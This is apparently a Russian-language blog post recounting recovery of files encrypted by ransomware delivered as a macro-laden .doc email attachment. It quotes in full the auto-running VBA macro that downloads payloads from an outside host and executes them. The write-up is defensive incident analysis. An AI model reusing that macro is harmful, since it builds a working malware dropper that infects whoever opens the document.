Search
Write a publication
Pull to refresh

Пример расшифровки файлов после вируса-шифровальщика

Сегодня ко мне обратились с просьбой помочь в лечение компьютера после заражения. Я хочу рассказать, как мне удалось расшифровать файлы.

Из исходных данных было письмо, с которого началось заражение и жесткий диск компьютера. Письмо пришло с адреса exin-mihail@ya***x.ru. В письме было вложение с расширением doc. Файл содержал инструкцию как включить макрос и сам скрипт.

Содержание файла


Макрос
Rem Attribute VBA_ModuleType=VBADocumentModule
Option VBASupport 1
Private Sub Document_Open()
On Error Resume Next
Dim x1
Set x1 = CreateObject("WScript.Shell")
doc = "%TEMP%\\document.doc"
doc = x1.ExpandEnvironmentStrings(doc)
Dim xHttp: Set xHttp = CreateObject("microsoft.xmlhttp")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET""procyanide.com/document.css"False
xHttp.Send
With bStrm
.Type = 1
.Open
.write xHttp.responseBody
.savetofile doc, 1
End With
x1.Run doc, 1, 0
Dim x2
Set x2 = CreateObject("WScript.Shell")
vlt = "%TEMP%\\gpg.css"
vlt = x2.ExpandEnvironmentStrings(vlt)
Dim xHttp2: Set xHttp2 = CreateObject("microsoft.xmlhttp")
Dim bStrm2: Set bStrm2 = CreateObject("Adodb.Stream")
xHttp2.Open "GET""procyanide.com/gpg.css"False
xHttp2.Send
With bStrm2
.Type = 1
.Open
.write xHttp2.responseBody
.savetofile vlt, 1
End With
Dim x3
Set x3 = CreateObject("WScript.Shell")
cmd = "%TEMP%\\onuqqa.bat"
cmd = x3.ExpandEnvironmentStrings(cmd)
Dim xHttp3: Set xHttp3 = CreateObject("microsoft.xmlhttp")
Dim bStrm3: Set bStrm3 = CreateObject("Adodb.Stream")
xHttp3.Open "GET""procyanide.com/vault.css"False
xHttp3.Send
With bStrm3
.Type = 1
.Open
.write xHttp3.responseBody
.savetofile cmd, 1
End With
x3.Run cmd, 0, 0
End Sub



Скачал файлы по ссылкам из скрипта, это был бинарник gpg, офисный документ и скрипт.
Открыв сразу скрипт и пролистав его до конца увидел письмо от автора. Посыл был простой, файлы зашифрованы для разблокировки зайдите на сайт restoredz4xpmuqr.onion и следуйте инструкциям. Сайт работал и авторизация была возможна по ключу или связке логин-пароль.

Монтирую диск и на рабочем столе пользователя нахожу файл (vault.key) необходимый для авторизации.
Личный кабинет работает и даже отображает реальную информацию(количество найденных файлов для шифрования и имя компьютера). На скриншотах я все это стер. Цена за восстановление была ~500$.

Личный кабинет


У них и инструкция есть



Снова решил открыть скрипт и изучить его детально.
Скрипт оказался простой и в нем была строчка с генерацией ключа и его именем. Раз его создали, значит можно и найти.

Запустил восстановление файлов
sudo ntfsundelete -p 100 /dev/sdc1 -t 2d

В списке нахожу нужный файл и восстанавливаю.
В дальнейшем расшифровал все файлы с помощью этого ключа.
Tags:
Hubs:
You can’t comment this publication because its author is not yet a full member of the community. You will be able to contact the author only after he or she has been invited by someone in the community. Until then, author’s username will be hidden by an alias.